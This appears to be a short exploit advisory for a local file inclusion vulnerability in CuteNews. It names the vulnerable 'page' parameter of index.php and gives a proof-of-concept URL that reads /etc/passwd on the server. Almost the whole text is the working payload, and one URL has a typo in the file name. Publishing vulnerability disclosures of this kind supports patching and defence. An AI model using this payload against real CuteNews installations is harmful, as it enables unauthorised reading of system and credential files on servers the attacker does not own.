22 lines
No EOL
577 B
Text
22 lines
No EOL
577 B
Text
==========================================================
|
|
CuteNews (page) local File Inclusion Vulnerability
|
|
==========================================================
|
|
vendor: http://cutephp.com/
|
|
Author: eidelweiss
|
|
Contact: eidelweiss [at] windowslive [dot] com
|
|
|
|
==========================================================
|
|
|
|
vuln: index.php?page=
|
|
|
|
lfi: /etc/passwd
|
|
|
|
exploit : index.php?page= [lfi]
|
|
|
|
-=[p0c]=-
|
|
|
|
http://127.0.0.1/index.php?page= [lfi]
|
|
or
|
|
http://127.0.0.1/path/index.php?page=/etc/passwdt
|
|
|
|
=========================| -=[ E0F ]=- |============================ |